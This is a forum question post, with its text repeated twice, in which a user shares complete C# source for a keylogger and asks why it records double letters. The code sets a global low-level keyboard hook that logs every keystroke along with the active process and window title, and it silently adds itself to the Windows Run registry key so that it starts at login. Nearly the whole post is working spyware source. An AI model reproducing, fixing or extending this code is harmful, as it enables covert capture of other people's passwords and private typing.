hi. so i devloped a simple keylogger with c# but when i type i see double letters in the keyloger textbox...
this is the main form code:
using System;using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Win32;
using System.IO;
namespace WindowsFormsApplication25
{
public partial class Form1 : Form
{
RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
private KeyboardService service = new KeyboardService();
public Form1()
{
key.SetValue("Your App Name", "\"" + Application.ExecutablePath.ToString() + "\"");
InitializeComponent();
}
int count = 0;
private void start_Click(object sender, EventArgs e)
{
service.KeyboardEventOccured += new EventHandler<KeyEventArgs>(service_KeyboardEventOccured);
}
private void end_Click(object sender, EventArgs e)
{
service.KeyboardEventOccured -= new EventHandler<KeyEventArgs>(service_KeyboardEventOccured);
}
void service_KeyboardEventOccured(object sender, KeyEventArgs e)
{
count++; ;
richTextBox1.Text += e.Unicode;
textBox1.Text = count.ToString();
}
}
}
this is what the keylogger records when i type:
double letters.. u see..
and this is the keyboard class i made:
using System;using System.Collections.Generic;
using System.Linq;
using System.Windows.Forms;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.ComponentModel;
using SWF = System.Windows.Forms;
namespace WindowsFormsApplication25
{
static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1());
}
}
public static class PInvoke
{
#region Delegate
public delegate IntPtr HookProc(int code, IntPtr wParam, IntPtr lParam);
#endregion
#region Enums
public enum HookType : int
{
WH_JOURNALRECORD = 0,
WH_JOURNALPLAYBACK = 1,
WH_KEYBOARD = 2,
WH_GETMESSAGE = 3,
WH_CALLWNDPROC = 4,
WH_CBT = 5,
WH_SYSMSGFILTER = 6,
WH_MOUSE = 7,
WH_HARDWARE = 8,
WH_DEBUG = 9,
WH_SHELL = 10,
WH_FOREGROUNDIDLE = 11,
WH_CALLWNDPROCRET = 12,
WH_KEYBOARD_LL = 13,
WH_MOUSE_LL = 14
}
public enum WM : uint
{
KEYDOWN = 0x0100,
SYSKEYDOWN = 0x0104,
}
[Flags]
public enum KBDLLHOOKSTRUCTFlags : uint
{
LLKHF_EXTENDED = 0x01,
LLKHF_INJECTED = 0x10,
LLKHF_ALTDOWN = 0x20,
LLKHF_UP = 0x80,
}
public enum VK
{
Shift = 0x10,
Capital = 0x14,
Numlock = 0x90,
Control = 0x11
}
public enum GetAncestor_Flags
{
GetParent = 1,
GetRoot = 2,
GetRootOwner = 3
}
#endregion
#region Struct
[StructLayout(LayoutKind.Sequential)]
public struct GuiThreadInfo
{
public int cbSize;
public uint flags;
public IntPtr hwndActive;
public IntPtr hwndFocus;
public IntPtr hwndCapture;
public IntPtr hwndMenuOwner;
public IntPtr hwndMoveSize;
public IntPtr hwndCaret;
public RECT rcCaret;
}
[StructLayout(LayoutKind.Sequential)]
public struct RECT
{
public int Left; // x position of upper-left corner
public int Top; // y position of upper-left corner
public int Right; // x position of lower-right corner
public int Bottom; // y position of lower-right corner
}
[StructLayout(LayoutKind.Sequential)]
public struct KeyboardHookStruct
{
public int VirtualKeyCode;
public int ScanCode;
public KBDLLHOOKSTRUCTFlags Flags;
public int Time;
public int ExtraInfo;
}
#endregion
#region PInvoke
[DllImport("user32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr SetWindowsHookEx(HookType hookType, HookProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern short GetKeyState(VK vKey);
[DllImport("user32.dll")]
public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll")]
public static extern bool GetKeyboardState(byte[] lpKeyState);
[DllImport("user32.dll")]
public static extern uint MapVirtualKey(uint uCode, uint uMapType);
[DllImport("user32.dll")]
public static extern IntPtr GetKeyboardLayout(uint idThread);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool GetGUIThreadInfo(uint idThread, ref GuiThreadInfo lpgui);
[DllImport("user32")]
public static extern int GetWindowThreadProcessId(IntPtr hWnd, out int processId);
[DllImport("user32.dll")]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", EntryPoint = "GetWindowText", ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)]
public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpWindowText, int nMaxCount);
[DllImport("user32.dll", ExactSpelling = true)]
public static extern IntPtr GetAncestor(IntPtr hwnd, GetAncestor_Flags gaFlags);
#endregion
}
public class KeyboardService
{
private IntPtr _currentHook;
private static PInvoke.HookProc _keyboardHookProc;
private EventHandler<KeyEventArgs> _keyboardEventOccured;
public event EventHandler<KeyEventArgs> KeyboardEventOccured
{
add
{
if (_keyboardEventOccured == null)
{
StartHookKeyboard();
}
_keyboardEventOccured += value;
}
remove
{
_keyboardEventOccured -= value;
if (_keyboardEventOccured == null)
{
StopHookKeyboard();
}
}
}
private void StopHookKeyboard()
{
PInvoke.UnhookWindowsHookEx(_currentHook);
}
private void StartHookKeyboard()
{
Process process = Process.GetCurrentProcess();
IntPtr pointer = process.MainModule.BaseAddress;
_keyboardHookProc = KeyboardHookProc;
_currentHook =
PInvoke.SetWindowsHookEx(PInvoke.HookType.WH_KEYBOARD_LL,
_keyboardHookProc,
pointer, 0);
if (_currentHook.ToInt32() == 0)
{
int errorCode = Marshal.GetLastWin32Error();
throw new Win32Exception(errorCode);
}
}
private IntPtr KeyboardHookProc(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0)
{
if (_keyboardEventOccured != null)
{
KeyState state = GetKeyState(wParam);
PInvoke.KeyboardHookStruct hookStruct = GetHookStruct(lParam);
TimeSpan time = TimeSpan.FromTicks(hookStruct.Time);
bool alt = hookStruct.Flags.HasFlag(PInvoke.KBDLLHOOKSTRUCTFlags.LLKHF_ALTDOWN);
bool shift = (PInvoke.GetKeyState(PInvoke.VK.Shift) & 0x80) == 0x80;
bool control = PInvoke.GetKeyState(PInvoke.VK.Control) != 0;
bool capslock = PInvoke.GetKeyState(PInvoke.VK.Capital) != 0;
bool numlook = PInvoke.GetKeyState(PInvoke.VK.Numlock) != 0;
IntPtr handle;
int processId;
int mainThredIs;
GetIds(out handle, out processId, out mainThredIs);
string processName = Process.GetProcessById(processId).ProcessName;
string unicode = VKCodeToUnicode(hookStruct.VirtualKeyCode, mainThredIs);
string title = GetTitle(handle);
KeyEventArgs args = new KeyEventArgs(hookStruct.VirtualKeyCode,
state, time,
alt, control, shift,
capslock, numlook,
unicode, handle,
processName, title);
_keyboardEventOccured(this, args);
}
}
return PInvoke.CallNextHookEx(_currentHook, nCode, wParam, lParam);
}
private static void GetIds(out IntPtr handle, out int processId, out int mainThredIs)
{
handle = GetFocusedHandle();
mainThredIs = PInvoke.GetWindowThreadProcessId(handle, out processId);
}
private static PInvoke.KeyboardHookStruct GetHookStruct(IntPtr lParam)
{
PInvoke.KeyboardHookStruct hookStruct =
(PInvoke.KeyboardHookStruct)Marshal.PtrToStructure(
lParam, typeof(PInvoke.KeyboardHookStruct));
return hookStruct;
}
private static KeyState GetKeyState(IntPtr wParam)
{
PInvoke.WM message = (PInvoke.WM)wParam.ToInt32();
KeyState state = KeyState.KeyDown;
return state;
}
private string VKCodeToUnicode(int VKCode, int threadId)
{
System.Text.StringBuilder sbString = new System.Text.StringBuilder();
byte[] bKeyState = new byte[255];
bool bKeyStateStatus = PInvoke.GetKeyboardState(bKeyState);
if (!bKeyStateStatus)
return "";
uint lScanCode = PInvoke.MapVirtualKey((uint)VKCode, 0);
IntPtr HKL = PInvoke.GetKeyboardLayout((uint)threadId);
PInvoke.ToUnicodeEx((uint)VKCode, lScanCode, bKeyState, sbString, (int)5, (uint)0, HKL);
return sbString.ToString();
}
private static IntPtr GetFocusedHandle()
{
var info = new PInvoke.GuiThreadInfo();
info.cbSize = Marshal.SizeOf(info);
if (!PInvoke.GetGUIThreadInfo(0, ref info))
{
throw new Win32Exception();
}
return info.hwndFocus;
}
private static string GetTitle(IntPtr hWnd)
{
StringBuilder strbTitle = new StringBuilder(255);
hWnd = PInvoke.GetAncestor(hWnd, PInvoke.GetAncestor_Flags.GetRoot);
PInvoke.GetWindowText(hWnd, strbTitle, strbTitle.Capacity + 1);
return strbTitle.ToString();
}
}
public class KeyEventArgs : EventArgs
{
public int KeyCode { get; private set; }
public IntPtr Handle { get; private set; }
public KeyState State { get; private set; }
public TimeSpan Time { get; private set; }
public bool Alt { get; private set; }
public bool Shift { get; private set; }
public bool Control { get; private set; }
public bool Capslock { get; private set; }
public bool Numlook { get; private set; }
public string Unicode { get; private set; }
public string ProcessName { get; private set; }
public string Title { get; private set; }
public SWF.Keys Key
{
get
{
return (SWF.Keys)KeyCode;
}
}
public KeyEventArgs(int key, KeyState keyState, TimeSpan time, bool alt, bool control, bool shift, bool capslock, bool numlook, string unicode, IntPtr handle, string processName, string title)
{
KeyCode = key;
Handle = handle;
State = keyState;
Time = time;
Alt = alt;
Control = control;
Shift = shift;
Unicode = unicode;
Capslock = capslock;
Numlook = numlook;
ProcessName = processName;
Title = title;
}
public override string ToString()
{
return Key.ToString();
}
}
public enum KeyState
{
KeyDown,
KeyUp,
}
}
its all working great but i think the method KeyboardEventOccured just called twice... im not sure but i think i recorded the both states..(keydown and keyup..) but im rly no sure..
i even tryed to use a simple count in the KeyboardEventOccured on the main form and i see that whenever im typing the count is getting bigger by2! even though i used only count++ .. so im pretty sure this method called twice.
can any1 look at the keyboard class code and see if anything is wrong? really huge thanks guys i appreicate your help :P just tell me which line to delete because im not sure...
Question
itapi
hi.
so i devloped a simple keylogger with c# but when i type i see double letters in the keyloger textbox...
this is the main form code:
using System;using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using Microsoft.Win32; using System.IO; namespace WindowsFormsApplication25 { public partial class Form1 : Form { RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); private KeyboardService service = new KeyboardService(); public Form1() { key.SetValue("Your App Name", "\"" + Application.ExecutablePath.ToString() + "\""); InitializeComponent(); } int count = 0; private void start_Click(object sender, EventArgs e) { service.KeyboardEventOccured += new EventHandler<KeyEventArgs>(service_KeyboardEventOccured); } private void end_Click(object sender, EventArgs e) { service.KeyboardEventOccured -= new EventHandler<KeyEventArgs>(service_KeyboardEventOccured); } void service_KeyboardEventOccured(object sender, KeyEventArgs e) { count++; ; richTextBox1.Text += e.Unicode; textBox1.Text = count.ToString(); } } }this is what the keylogger records when i type:
double letters.. u see..
and this is the keyboard class i made:
using System;using System.Collections.Generic; using System.Linq; using System.Windows.Forms; using System.Text; using System.Threading.Tasks; using System.Diagnostics; using System.Runtime.InteropServices; using System.ComponentModel; using SWF = System.Windows.Forms; namespace WindowsFormsApplication25 { static class Program { /// <summary> /// The main entry point for the application. /// </summary> [STAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new Form1()); } } public static class PInvoke { #region Delegate public delegate IntPtr HookProc(int code, IntPtr wParam, IntPtr lParam); #endregion #region Enums public enum HookType : int { WH_JOURNALRECORD = 0, WH_JOURNALPLAYBACK = 1, WH_KEYBOARD = 2, WH_GETMESSAGE = 3, WH_CALLWNDPROC = 4, WH_CBT = 5, WH_SYSMSGFILTER = 6, WH_MOUSE = 7, WH_HARDWARE = 8, WH_DEBUG = 9, WH_SHELL = 10, WH_FOREGROUNDIDLE = 11, WH_CALLWNDPROCRET = 12, WH_KEYBOARD_LL = 13, WH_MOUSE_LL = 14 } public enum WM : uint { KEYDOWN = 0x0100, SYSKEYDOWN = 0x0104, } [Flags] public enum KBDLLHOOKSTRUCTFlags : uint { LLKHF_EXTENDED = 0x01, LLKHF_INJECTED = 0x10, LLKHF_ALTDOWN = 0x20, LLKHF_UP = 0x80, } public enum VK { Shift = 0x10, Capital = 0x14, Numlock = 0x90, Control = 0x11 } public enum GetAncestor_Flags { GetParent = 1, GetRoot = 2, GetRootOwner = 3 } #endregion #region Struct [StructLayout(LayoutKind.Sequential)] public struct GuiThreadInfo { public int cbSize; public uint flags; public IntPtr hwndActive; public IntPtr hwndFocus; public IntPtr hwndCapture; public IntPtr hwndMenuOwner; public IntPtr hwndMoveSize; public IntPtr hwndCaret; public RECT rcCaret; } [StructLayout(LayoutKind.Sequential)] public struct RECT { public int Left; // x position of upper-left corner public int Top; // y position of upper-left corner public int Right; // x position of lower-right corner public int Bottom; // y position of lower-right corner } [StructLayout(LayoutKind.Sequential)] public struct KeyboardHookStruct { public int VirtualKeyCode; public int ScanCode; public KBDLLHOOKSTRUCTFlags Flags; public int Time; public int ExtraInfo; } #endregion #region PInvoke [DllImport("user32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", SetLastError = true)] public static extern IntPtr SetWindowsHookEx(HookType hookType, HookProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)] public static extern short GetKeyState(VK vKey); [DllImport("user32.dll")] public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl); [DllImport("user32.dll")] public static extern bool GetKeyboardState(byte[] lpKeyState); [DllImport("user32.dll")] public static extern uint MapVirtualKey(uint uCode, uint uMapType); [DllImport("user32.dll")] public static extern IntPtr GetKeyboardLayout(uint idThread); [DllImport("user32.dll", SetLastError = true)] public static extern bool GetGUIThreadInfo(uint idThread, ref GuiThreadInfo lpgui); [DllImport("user32")] public static extern int GetWindowThreadProcessId(IntPtr hWnd, out int processId); [DllImport("user32.dll")] public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("user32.dll", EntryPoint = "GetWindowText", ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)] public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpWindowText, int nMaxCount); [DllImport("user32.dll", ExactSpelling = true)] public static extern IntPtr GetAncestor(IntPtr hwnd, GetAncestor_Flags gaFlags); #endregion } public class KeyboardService { private IntPtr _currentHook; private static PInvoke.HookProc _keyboardHookProc; private EventHandler<KeyEventArgs> _keyboardEventOccured; public event EventHandler<KeyEventArgs> KeyboardEventOccured { add { if (_keyboardEventOccured == null) { StartHookKeyboard(); } _keyboardEventOccured += value; } remove { _keyboardEventOccured -= value; if (_keyboardEventOccured == null) { StopHookKeyboard(); } } } private void StopHookKeyboard() { PInvoke.UnhookWindowsHookEx(_currentHook); } private void StartHookKeyboard() { Process process = Process.GetCurrentProcess(); IntPtr pointer = process.MainModule.BaseAddress; _keyboardHookProc = KeyboardHookProc; _currentHook = PInvoke.SetWindowsHookEx(PInvoke.HookType.WH_KEYBOARD_LL, _keyboardHookProc, pointer, 0); if (_currentHook.ToInt32() == 0) { int errorCode = Marshal.GetLastWin32Error(); throw new Win32Exception(errorCode); } } private IntPtr KeyboardHookProc(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode >= 0) { if (_keyboardEventOccured != null) { KeyState state = GetKeyState(wParam); PInvoke.KeyboardHookStruct hookStruct = GetHookStruct(lParam); TimeSpan time = TimeSpan.FromTicks(hookStruct.Time); bool alt = hookStruct.Flags.HasFlag(PInvoke.KBDLLHOOKSTRUCTFlags.LLKHF_ALTDOWN); bool shift = (PInvoke.GetKeyState(PInvoke.VK.Shift) & 0x80) == 0x80; bool control = PInvoke.GetKeyState(PInvoke.VK.Control) != 0; bool capslock = PInvoke.GetKeyState(PInvoke.VK.Capital) != 0; bool numlook = PInvoke.GetKeyState(PInvoke.VK.Numlock) != 0; IntPtr handle; int processId; int mainThredIs; GetIds(out handle, out processId, out mainThredIs); string processName = Process.GetProcessById(processId).ProcessName; string unicode = VKCodeToUnicode(hookStruct.VirtualKeyCode, mainThredIs); string title = GetTitle(handle); KeyEventArgs args = new KeyEventArgs(hookStruct.VirtualKeyCode, state, time, alt, control, shift, capslock, numlook, unicode, handle, processName, title); _keyboardEventOccured(this, args); } } return PInvoke.CallNextHookEx(_currentHook, nCode, wParam, lParam); } private static void GetIds(out IntPtr handle, out int processId, out int mainThredIs) { handle = GetFocusedHandle(); mainThredIs = PInvoke.GetWindowThreadProcessId(handle, out processId); } private static PInvoke.KeyboardHookStruct GetHookStruct(IntPtr lParam) { PInvoke.KeyboardHookStruct hookStruct = (PInvoke.KeyboardHookStruct)Marshal.PtrToStructure( lParam, typeof(PInvoke.KeyboardHookStruct)); return hookStruct; } private static KeyState GetKeyState(IntPtr wParam) { PInvoke.WM message = (PInvoke.WM)wParam.ToInt32(); KeyState state = KeyState.KeyDown; return state; } private string VKCodeToUnicode(int VKCode, int threadId) { System.Text.StringBuilder sbString = new System.Text.StringBuilder(); byte[] bKeyState = new byte[255]; bool bKeyStateStatus = PInvoke.GetKeyboardState(bKeyState); if (!bKeyStateStatus) return ""; uint lScanCode = PInvoke.MapVirtualKey((uint)VKCode, 0); IntPtr HKL = PInvoke.GetKeyboardLayout((uint)threadId); PInvoke.ToUnicodeEx((uint)VKCode, lScanCode, bKeyState, sbString, (int)5, (uint)0, HKL); return sbString.ToString(); } private static IntPtr GetFocusedHandle() { var info = new PInvoke.GuiThreadInfo(); info.cbSize = Marshal.SizeOf(info); if (!PInvoke.GetGUIThreadInfo(0, ref info)) { throw new Win32Exception(); } return info.hwndFocus; } private static string GetTitle(IntPtr hWnd) { StringBuilder strbTitle = new StringBuilder(255); hWnd = PInvoke.GetAncestor(hWnd, PInvoke.GetAncestor_Flags.GetRoot); PInvoke.GetWindowText(hWnd, strbTitle, strbTitle.Capacity + 1); return strbTitle.ToString(); } } public class KeyEventArgs : EventArgs { public int KeyCode { get; private set; } public IntPtr Handle { get; private set; } public KeyState State { get; private set; } public TimeSpan Time { get; private set; } public bool Alt { get; private set; } public bool Shift { get; private set; } public bool Control { get; private set; } public bool Capslock { get; private set; } public bool Numlook { get; private set; } public string Unicode { get; private set; } public string ProcessName { get; private set; } public string Title { get; private set; } public SWF.Keys Key { get { return (SWF.Keys)KeyCode; } } public KeyEventArgs(int key, KeyState keyState, TimeSpan time, bool alt, bool control, bool shift, bool capslock, bool numlook, string unicode, IntPtr handle, string processName, string title) { KeyCode = key; Handle = handle; State = keyState; Time = time; Alt = alt; Control = control; Shift = shift; Unicode = unicode; Capslock = capslock; Numlook = numlook; ProcessName = processName; Title = title; } public override string ToString() { return Key.ToString(); } } public enum KeyState { KeyDown, KeyUp, } }its all working great but i think the method KeyboardEventOccured just called twice... im not sure but i think i recorded the both states..(keydown and keyup..) but im rly no sure..
i even tryed to use a simple count in the KeyboardEventOccured on the main form and i see that whenever im typing the count is getting bigger by2! even though i used only count++ .. so im pretty sure this method called twice.
can any1 look at the keyboard class code and see if anything is wrong?
really huge thanks guys i appreicate your help :P
just tell me which line to delete because im not sure...
have a good day
Link to comment
Share on other sites
2 answers to this question
Recommended Posts